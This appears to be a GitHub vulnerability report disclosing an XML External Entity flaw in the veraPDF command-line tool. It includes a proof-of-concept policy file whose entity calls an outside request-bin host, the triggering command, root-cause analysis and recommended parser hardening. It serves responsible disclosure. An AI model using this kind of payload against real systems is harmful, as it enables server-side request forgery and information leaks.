Potential XXE(XML External Entity Injection) vulnerability in veraPDFCli

[JAckLosingHeart]

Hi team,

A malicious policyfile in XML passed to veraPDF CLI can lead to a XXE vulnerability exploitation due to insecure use of XML parser. The policyfile be the attack payload, which is similar to previously fixed issue #1415, but this vulnerability happens at a different place within CLI tool even before the XSL transformation happens.

### POC
Installed the latest veraPDF, installer downloaded from the website:

PS C:\Users\samym\Documents\verapdf-poc> verapdf --version
veraPDF 1.26.2
Built: Sun May 19 13:33:00 CST 2024
Developed and released by the veraPDF Consortium.
Funded by the PREFORMA project.
Released under the GNU General Public License v3
and the Mozilla Public License v2 or later.

malicious policyfile which doesn't have to be a xsl file to be parsed, poc.xml:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "https://eo9k3koijwh1jvr.m.pipedream.net/poc">]>
<root>&xxe;</root>

https://eo9k3koijwh1jvr.m.pipedream.net is a malicious website I set up to log incoming request for demo purpose only

And prepare a pdf whatever named test.pdf
Execute:

PS C:\Users\samym\Documents\verapdf-poc> verapdf --policyfile .\poc.xml .\test.pdf
Exception in thread "main" org.verapdf.core.VeraPDFException: Policy file extension must be one of sch, xsl, or xslt
        at org.verapdf.policy.PolicyChecker.applyPolicy(PolicyChecker.java:125)
        at org.verapdf.cli.VeraPdfCliProcessor.applyPolicy(VeraPdfCliProcessor.java:247)
        at org.verapdf.cli.VeraPdfCliProcessor.processPaths(VeraPdfCliProcessor.java:107)
        at org.verapdf.cli.VeraPdfCli.singleThreadProcess(VeraPdfCli.java:142)
        at org.verapdf.cli.VeraPdfCli.main(VeraPdfCli.java:111)
        at org.verapdf.apps.GreenfieldCliWrapper.main(GreenfieldCliWrapper.java:54)

Though there was a exception when applying policy, vulnerability can be still triggered even before that
Could see the request came in on my request bin anyway:

This vulnerability could be further exploited and lead to information leak, SSRF and possibly RCE

### Root cause analysis:
The problem is actually inside function mergeEnabledFeaturesFromPolicy under org.verapdf.apps.utils.ApplicationUtils:
https://github.com/veraPDF/veraPDF-apps/blob/v1.27.88/gui/src/main/java/org/verapdf/apps/utils/ApplicationUtils.java#L171

The policyfile is parsed without secure settings on or external entities disabled, which finally leads to a XXE vulnerability. Also, this function is not only used by veraPDFCli, but used in other places as well, which means there could be more attack surface

### Recommendations:
Enable secure processing of XML files
dbf.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
Or
Disable all external entities

dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);

[JAckLosingHeart]

Hi team! Thank you for addressing and fixing the security issue I reported. To help other users identify and understand the implications of this fix, could we consider requesting a CVE number for this vulnerability? This would make it easier for users to track and assess any related security concerns.